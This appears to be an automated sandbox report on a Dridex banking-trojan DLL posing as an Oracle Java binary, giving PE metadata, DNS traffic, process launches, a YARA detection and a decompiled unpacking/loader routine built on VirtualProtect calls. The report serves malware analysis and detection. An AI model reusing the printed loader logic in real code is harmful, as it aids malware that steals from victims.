                                                                                                                              File Content Preview:MZ......................@...................................\...........!..L.!This program cannot be run in DOS mode....$.......Xm.o...<...<...<.U!<...<..B<r..<...<...<rQ!<...<;..<...<;..<3..<au.<...<szt<"..<Rich...<.......................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x10024cc0
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x10000000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                              Time Stamp:0x609C7F8D [Thu May 13 01:23:25 2021 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:5
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:5
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:5
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:88962f6760ea005847fb88b87e8ce1fd

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              mov eax, 00000000h
                                                                                                                              cmpss xmm1, xmm2, 03h
                                                                                                                              mov edx, 00000000h
                                                                                                                              mov edx, 00000000h
                                                                                                                              mov edx, 00000000h
                                                                                                                              mov edx, 00000000h
                                                                                                                              mov edx, 00000000h
                                                                                                                              mov edx, 00000000h
                                                                                                                              mov edx, 00000000h
                                                                                                                              cmpss xmm1, xmm2, 03h
                                                                                                                              cmp eax, 02h
                                                                                                                              mov eax, ebp
                                                                                                                              mov dword ptr [10029734h], eax
                                                                                                                              mov eax, ebx
                                                                                                                              mov dword ptr [10029730h], eax
                                                                                                                              mov eax, esi
                                                                                                                              mov dword ptr [10029728h], eax
                                                                                                                              jne 00007F1FB07153E6h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h
                                                                                                                              mov eax, 00000000h

                                                                                                                              Rich Headers

                                                                                                                              Programming Language:
                                                                                                                              • [RES] VS2015 build 23026
                                                                                                                              • [IMP] VS2013 UPD4 build 31101
                                                                                                                              • [ C ] VS2010 build 30319
                                                                                                                              • [RES] VS2015 UPD2 build 23918
                                                                                                                              • [C++] VS2005 build 50727
                                                                                                                              • [IMP] VS2010 SP1 build 40219
                                                                                                                              • [RES] VS2012 build 50727

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x2770a0x5b.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x277d80x59.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x3a0.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d0000x1220
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x100180x38.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x250000x4c.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x23dfe0x23e00False0.756362968206data7.53078515147IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x250000x2a040x2c00False0.753728693182data7.42331753213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .crt0x280000x331c0x1800False0.79052734375MMDF mailbox7.46423038313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0x2c0000x3a00x400False0.4248046875data3.06187161643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x2d0000x26c0x400False0.548828125data4.2946697642IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                              RT_VERSION0x2c0600x33cdata

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              KERNEL32.dllGetProfileSectionW, CloseHandle, OpenSemaphoreW, LoadLibraryW, OutputDebugStringA, CreateFileW, GetProfileSectionA
                                                                                                                              USER32.dllTranslateMessage
                                                                                                                              CLUSAPI.dllClusterEnum
                                                                                                                              ADVAPI32.dllRegOverridePredefKey
                                                                                                                              RASAPI32.dllRasGetConnectionStatistics
                                                                                                                              ole32.dllCreatePointerMoniker, CreateStreamOnHGlobal

                                                                                                                              Version Infos

                                                                                                                              DescriptionData
                                                                                                                              LegalCopyrightCopyright 2018
                                                                                                                              InternalNamex2otfb
                                                                                                                              FileVersion7.2.5422.00
                                                                                                                              Full Version7.2.5_000-b00
                                                                                                                              CompanyNameOracle Corporation
                                                                                                                              ProductNameXhot(BM) Ltloehey YO 8
                                                                                                                              ProductVersion7.2.5422.00
                                                                                                                              FileDescriptionJava(TM) Platform SE binary
                                                                                                                              OriginalFilenamex2otfb.dll
                                                                                                                              Translation0x0000 0x04b0

                                                                                                                              Network Behavior

                                                                                                                              Network Port Distribution

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              May 13, 2021 06:45:16.858978033 CEST6245253192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:16.916229963 CEST53624528.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:16.960442066 CEST5782053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:17.032674074 CEST53578208.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:17.078094006 CEST5084853192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:17.126864910 CEST53508488.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:18.458739996 CEST6124253192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:18.510399103 CEST53612428.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:19.969510078 CEST5856253192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:20.018170118 CEST53585628.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:21.363408089 CEST5659053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:21.413368940 CEST53565908.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:21.787792921 CEST6050153192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:21.846291065 CEST53605018.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:22.247548103 CEST5377553192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:22.296412945 CEST53537758.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:23.401303053 CEST5183753192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:23.452872992 CEST53518378.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:24.238642931 CEST5541153192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:24.296010017 CEST53554118.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:25.394905090 CEST6366853192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:25.445341110 CEST53636688.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:28.848978996 CEST5464053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:28.900877953 CEST53546408.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:30.006038904 CEST5873953192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:30.054965019 CEST53587398.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:31.120771885 CEST6033853192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:31.169487953 CEST53603388.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:31.901037931 CEST5871753192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:31.951039076 CEST53587178.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:33.007996082 CEST5976253192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:33.065093994 CEST53597628.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:34.603598118 CEST5432953192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:34.652767897 CEST53543298.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:35.820996046 CEST5805253192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:35.873516083 CEST53580528.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:38.099172115 CEST5400853192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:38.156212091 CEST53540088.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:42.077595949 CEST5945153192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:42.152453899 CEST53594518.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:43.340884924 CEST5291453192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:43.389533043 CEST53529148.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:44.262176037 CEST6456953192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:44.319230080 CEST53645698.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:45.293451071 CEST5281653192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:45.344130993 CEST53528168.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:46.928621054 CEST5078153192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:46.980149984 CEST53507818.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:45:47.888087988 CEST5423053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:45:47.937071085 CEST53542308.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:46:05.920085907 CEST5491153192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:46:05.977070093 CEST53549118.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:46:06.066992044 CEST4995853192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:46:06.142282009 CEST53499588.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:46:12.870557070 CEST5086053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:46:12.929270983 CEST53508608.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:46:26.063349962 CEST5045253192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:46:26.131953001 CEST53504528.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:46:57.124495029 CEST5973053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:46:57.192188978 CEST53597308.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:02.482069016 CEST5931053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:02.541301012 CEST53593108.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:23.077673912 CEST5191953192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:23.134807110 CEST53519198.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:23.909102917 CEST6429653192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:23.966233015 CEST53642968.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:24.566605091 CEST5668053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:24.624649048 CEST53566808.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:25.099431038 CEST5882053192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:25.160821915 CEST53588208.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:25.660111904 CEST6098353192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:25.717369080 CEST53609838.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:25.756376982 CEST4924753192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:25.815776110 CEST53492478.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:26.397536039 CEST5228653192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:26.454792023 CEST53522868.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:26.916636944 CEST5606453192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:26.966615915 CEST53560648.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:27.819137096 CEST6374453192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:27.881023884 CEST53637448.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:28.672205925 CEST6145753192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:28.720978975 CEST53614578.8.8.8192.168.2.7
                                                                                                                              May 13, 2021 06:47:29.219227076 CEST5836753192.168.2.78.8.8.8
                                                                                                                              May 13, 2021 06:47:29.270775080 CEST53583678.8.8.8192.168.2.7

                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Start time:06:45:24
                                                                                                                              Start date:13/05/2021
                                                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll'
                                                                                                                              Imagebase:0x10b0000
                                                                                                                              File size:116736 bytes
                                                                                                                              MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:06:45:24
                                                                                                                              Start date:13/05/2021
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1
                                                                                                                              Imagebase:0x870000
                                                                                                                              File size:232960 bytes
                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:06:45:24
                                                                                                                              Start date:13/05/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1
                                                                                                                              Imagebase:0xf0000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.326422259.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:06:45:57
                                                                                                                              Start date:13/05/2021
                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 764
                                                                                                                              Imagebase:0x870000
                                                                                                                              File size:434592 bytes
                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Disassembly

                                                                                                                              Code Analysis

                                                                                                                              Reset < >

                                                                                                                                Executed Functions

                                                                                                                                Non-executed Functions

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.231112101.0000000010021000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.231089981.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.231093819.0000000010001000.00000020.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.231118636.0000000010025000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.231123745.0000000010028000.00000008.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.231129272.000000001002C000.00000002.00020000.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: D$a$c$i$l$l$o$t$u
                                                                                                                                • API String ID: 0-1871623029
                                                                                                                                • Opcode ID: 39defe97fc93470a7b804fd6dc8be910f88b852905747cfc221465a6754b1396
                                                                                                                                • Instruction ID: 0084815472b1379f451f328db7bdd48fedf0434f01950e1a6ab525a79fee850b
                                                                                                                                • Opcode Fuzzy Hash: 39defe97fc93470a7b804fd6dc8be910f88b852905747cfc221465a6754b1396
                                                                                                                                • Instruction Fuzzy Hash: 6142A774608780CFD374CF28C894BDABBE1ABD9354F54892EE48D8B391E731A845CB56
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Executed Functions

                                                                                                                                C-Code - Quality: 42%
                                                                                                                                			E027923D4(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
                                                                                                                                				char _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				intOrPtr _v28;
                                                                                                                                				intOrPtr _v32;
                                                                                                                                				intOrPtr _v36;
                                                                                                                                				intOrPtr _v40;
                                                                                                                                				char _v44;
                                                                                                                                				intOrPtr _v48;
                                                                                                                                				intOrPtr _v52;
                                                                                                                                				intOrPtr _v56;
                                                                                                                                				intOrPtr _v60;
                                                                                                                                				intOrPtr _v64;
                                                                                                                                				void* _v68;
                                                                                                                                				char* _v72;
                                                                                                                                				int _v76;
                                                                                                                                				long _v80;
                                                                                                                                				long _v84;
                                                                                                                                				DWORD* _v88;
                                                                                                                                				intOrPtr _v92;
                                                                                                                                				int _v96;
                                                                                                                                				intOrPtr* _v100;
                                                                                                                                				intOrPtr _v104;
                                                                                                                                				intOrPtr _v108;
                                                                                                                                				intOrPtr _v112;
                                                                                                                                				void* _v116;
                                                                                                                                				intOrPtr _v120;
                                                                                                                                				intOrPtr _v124;
                                                                                                                                				intOrPtr _v128;
                                                                                                                                				intOrPtr _v132;
                                                                                                                                				intOrPtr _v136;
                                                                                                                                				char* _v140;
                                                                                                                                				intOrPtr _v144;
                                                                                                                                				intOrPtr _v148;
                                                                                                                                				intOrPtr _v152;
                                                                                                                                				intOrPtr _v156;
                                                                                                                                				unsigned int _v160;
                                                                                                                                				signed int _v164;
                                                                                                                                				signed int _v168;
                                                                                                                                				signed int _v172;
                                                                                                                                				intOrPtr _v176;
                                                                                                                                				int _v180;
                                                                                                                                				char* _v184;
                                                                                                                                				intOrPtr _v188;
                                                                                                                                				intOrPtr _v192;
                                                                                                                                				char _v196;
                                                                                                                                				intOrPtr* _t142;
                                                                                                                                				int _t148;
                                                                                                                                				int _t156;
                                                                                                                                				int _t160;
                                                                                                                                				unsigned int _t180;
                                                                                                                                				int _t196;
                                                                                                                                				intOrPtr _t230;
                                                                                                                                				intOrPtr _t232;
                                                                                                                                				void* _t237;
                                                                                                                                				intOrPtr _t240;
                                                                                                                                				void* _t247;
                                                                                                                                				intOrPtr _t251;
                                                                                                                                				intOrPtr _t258;
                                                                                                                                				DWORD* _t271;
                                                                                                                                				void* _t275;
                                                                                                                                				intOrPtr* _t278;
                                                                                                                                				intOrPtr* _t279;
                                                                                                                                
                                                                                                                                				_t142 = _a4;
                                                                                                                                				_v20 = 0;
                                                                                                                                				_t247 =  *_t142;
                                                                                                                                				 *0x2794418 = 1;
                                                                                                                                				asm("movaps xmm0, [0x2793010]");
                                                                                                                                				asm("movups [0x2794428], xmm0");
                                                                                                                                				_v48 = _t142;
                                                                                                                                				_v52 =  *((intOrPtr*)(_t142 + 0x48));
                                                                                                                                				_v56 =  *((intOrPtr*)(_v48 + 0x6c));
                                                                                                                                				_v196 = _t247;
                                                                                                                                				_v192 =  *((intOrPtr*)(_v48 + 0x24));
                                                                                                                                				_v188 = 4;
                                                                                                                                				_v184 =  &_v20;
                                                                                                                                				_v60 =  *((intOrPtr*)(_t142 + 0x1c));
                                                                                                                                				_v64 = 4;
                                                                                                                                				_v68 = _t247;
                                                                                                                                				_v72 =  &_v20;
                                                                                                                                				_t148 = VirtualProtect(__edi, __esi, __ebx, _t271); // executed
                                                                                                                                				_v76 = _t148;
                                                                                                                                				_v196 = _v68;
                                                                                                                                				_v192 = 0;
                                                                                                                                				_v188 =  *((intOrPtr*)(_v48 + 0x24));
                                                                                                                                				_v80 = 0x400;
                                                                                                                                				_v84 = 2;
                                                                                                                                				_v88 =  &_v20;
                                                                                                                                				_v92 = 0;
                                                                                                                                				E02791E7B();
                                                                                                                                				E02791094(_v68,  *((intOrPtr*)(_v48 + 0x44)), _v56);
                                                                                                                                				E02791E7B( *((intOrPtr*)(_v48 + 0x44)), 0, _v56);
                                                                                                                                				_t156 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                                                				_t278 = _t275 - 0x94;
                                                                                                                                				_t237 = _v68;
                                                                                                                                				_t258 =  *((intOrPtr*)(_t237 + 0x3c));
                                                                                                                                				_v96 = _t156;
                                                                                                                                				_v100 = _v68 + 0x3c;
                                                                                                                                				_v104 = _t237;
                                                                                                                                				_v108 = _t258;
                                                                                                                                				if(_t258 != 0) {
                                                                                                                                					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                				}
                                                                                                                                				_v120 = _v104;
                                                                                                                                				if(_v52 != 0) {
                                                                                                                                					_v144 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
                                                                                                                                					_v148 = 0;
                                                                                                                                					while(1) {
                                                                                                                                						_t230 = _v144;
                                                                                                                                						_v156 = _v148;
                                                                                                                                						_t180 =  *(_t230 + 0x24);
                                                                                                                                						_v160 = _t180;
                                                                                                                                						_v164 = _t180 >> 0x1e;
                                                                                                                                						_v168 = _v160 >> 0x1f;
                                                                                                                                						_v172 = _v160 >> 0x0000001d & 0x00000001;
                                                                                                                                						_v196 = _v68 +  *((intOrPtr*)(_t230 + 0xc));
                                                                                                                                						_v192 =  *((intOrPtr*)(_t230 + 8));
                                                                                                                                						_v188 =  *((intOrPtr*)(0x2794418 + ((_v164 & 0x00000001) << 4) + (_v168 << 3) + (_v172 << 2)));
                                                                                                                                						_v184 =  &_v20;
                                                                                                                                						_v176 = _t230;
                                                                                                                                						_t196 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                						_t278 = _t278 - 0x10;
                                                                                                                                						_t232 = _v156 + 1;
                                                                                                                                						_v180 = _t196;
                                                                                                                                						_v144 = _v176 + 0x28;
                                                                                                                                						_v148 = _t232;
                                                                                                                                						if(_t232 == _v52) {
                                                                                                                                							goto L11;
                                                                                                                                						}
                                                                                                                                					}
                                                                                                                                				}
                                                                                                                                				L11:
                                                                                                                                				 *_t278 = _v68;
                                                                                                                                				_v124 = _v68 +  *((intOrPtr*)(_v48 + 0x10));
                                                                                                                                				_t160 = DisableThreadLibraryCalls(??);
                                                                                                                                				_t279 = _t278 - 4;
                                                                                                                                				_t240 =  *_v100;
                                                                                                                                				_v152 = _t160;
                                                                                                                                				_v112 = _t240;
                                                                                                                                				_v116 = _v68;
                                                                                                                                				if(_t240 == 0) {
                                                                                                                                					L7:
                                                                                                                                					_t251 = _v48;
                                                                                                                                					_v44 =  *((intOrPtr*)(_t251 + 0x40));
                                                                                                                                					_v40 =  *((intOrPtr*)(_t251 + 0x4c));
                                                                                                                                					_v36 =  *((intOrPtr*)(_t251 + 0x20));
                                                                                                                                					_v32 =  *((intOrPtr*)(_t251 + 0x54));
                                                                                                                                					_v28 =  *((intOrPtr*)(_t251 + 0x58));
                                                                                                                                					_v24 = _v124;
                                                                                                                                					 *_t279 = _t251;
                                                                                                                                					_v196 = 0;
                                                                                                                                					_v192 = 0x74;
                                                                                                                                					_v128 =  *((intOrPtr*)(_v116 + 0x28));
                                                                                                                                					_v132 = 0;
                                                                                                                                					_v136 = 0x74;
                                                                                                                                					_v140 =  &_v44;
                                                                                                                                					E02791E7B();
                                                                                                                                					if(_v128 != 0) {
                                                                                                                                						_t278 =  *((intOrPtr*)( &_v44 + 0x10));
                                                                                                                                						goto __eax;
                                                                                                                                					}
                                                                                                                                					return 1;
                                                                                                                                				} else {
                                                                                                                                					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                					goto L7;
                                                                                                                                				}
                                                                                                                                			}

































































                                                                                                                                0x027923e0
                                                                                                                                0x027923ee
                                                                                                                                0x027923f5
                                                                                                                                0x027923f7
                                                                                                                                0x02792401
                                                                                                                                0x02792408
                                                                                                                                0x02792412
                                                                                                                                0x02792418
                                                                                                                                0x02792421
                                                                                                                                0x0279242a
                                                                                                                                0x0279242d
                                                                                                                                0x02792431
                                                                                                                                0x02792439
                                                                                                                                0x0279243d
                                                                                                                                0x02792440
                                                                                                                                0x02792443
                                                                                                                                0x02792446
                                                                                                                                0x02792449
                                                                                                                                0x02792463
                                                                                                                                0x02792469
                                                                                                                                0x0279246c
                                                                                                                                0x02792474
                                                                                                                                0x02792478
                                                                                                                                0x0279247b
                                                                                                                                0x0279247e
                                                                                                                                0x02792481
                                                                                                                                0x02792484
                                                                                                                                0x027924a0
                                                                                                                                0x027924bd
                                                                                                                                0x027924e2
                                                                                                                                0x027924e4
                                                                                                                                0x027924ed
                                                                                                                                0x027924f0
                                                                                                                                0x027924fa
                                                                                                                                0x027924fd
                                                                                                                                0x02792500
                                                                                                                                0x02792503
                                                                                                                                0x02792506
                                                                                                                                0x0279255a
                                                                                                                                0x0279255a
                                                                                                                                0x02792566
                                                                                                                                0x02792569
                                                                                                                                0x027925ed
                                                                                                                                0x027925f3
                                                                                                                                0x0279265e
                                                                                                                                0x02792664
                                                                                                                                0x02792679
                                                                                                                                0x0279267f
                                                                                                                                0x02792682
                                                                                                                                0x0279268b
                                                                                                                                0x0279269a
                                                                                                                                0x027926ac
                                                                                                                                0x027926dd
                                                                                                                                0x027926e0
                                                                                                                                0x027926e4
                                                                                                                                0x027926e8
                                                                                                                                0x027926ef
                                                                                                                                0x027926f5
                                                                                                                                0x027926f7
                                                                                                                                0x02792700
                                                                                                                                0x02792711
                                                                                                                                0x02792717
                                                                                                                                0x0279271d
                                                                                                                                0x02792723
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x02792729
                                                                                                                                0x0279265e
                                                                                                                                0x0279261a
                                                                                                                                0x02792628
                                                                                                                                0x02792630
                                                                                                                                0x02792633
                                                                                                                                0x02792635
                                                                                                                                0x0279263b
                                                                                                                                0x02792647
                                                                                                                                0x0279264d
                                                                                                                                0x02792650
                                                                                                                                0x02792653
                                                                                                                                0x02792571
                                                                                                                                0x02792581
                                                                                                                                0x02792587
                                                                                                                                0x0279258d
                                                                                                                                0x02792593
                                                                                                                                0x02792599
                                                                                                                                0x0279259f
                                                                                                                                0x027925a5
                                                                                                                                0x027925a8
                                                                                                                                0x027925ab
                                                                                                                                0x027925b3
                                                                                                                                0x027925bb
                                                                                                                                0x027925be
                                                                                                                                0x027925c1
                                                                                                                                0x027925c7
                                                                                                                                0x027925cd
